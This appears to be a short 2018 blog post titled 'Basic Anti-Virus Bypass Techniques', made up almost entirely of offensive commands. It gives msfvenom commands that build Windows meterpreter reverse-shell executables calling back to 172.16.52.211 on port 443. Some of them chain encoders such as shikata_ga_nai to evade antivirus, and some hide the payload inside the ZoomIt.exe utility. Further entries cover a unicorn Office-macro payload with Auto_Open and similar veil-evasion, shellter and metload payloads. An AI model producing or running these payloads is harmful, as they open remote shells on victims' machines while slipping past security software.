Comments

Theme images by Storman. Powered by Blogger.

Post Top Ad

Search This Blog

Post Top Ad

Archive

Post Top Ad

Author Details

Hot

Sponsor

Beauty

Popular

Photography

Recent

About Us

Tuesday, January 23, 2018

Basic Anti-Virus Bypass Techniques

- No comments


Basic Anti-Virus bypass techniques: msfvenom, veil-evasion, shellter, unicorn and metload (private)

msfencode (part of metasploit framework)
--------------------
msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -f exe -o rev_tcp_211_442.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -e x86/shikata_ga_nai -i 11 -x ZoomIt.exe -f exe -o rev_tcp_shikata_211_443.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13  -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -f exe  -x ZoomIt.exe -o rev_tcp_multiple_211_443.exe


veil-evasion
---------------------
c/meterpreter
python/meterpreter



shellter
-------------
auto & buitlin meterpreter payload

auto & custom multi encode meterpreter payload

unicorn
-------------
./unicorn.py windows/meterpreter/reverse_tcp 172.16.52.211 443 macro
Auto_Open()

metload
-------------
./autometload.py 2 172.16.52.211 443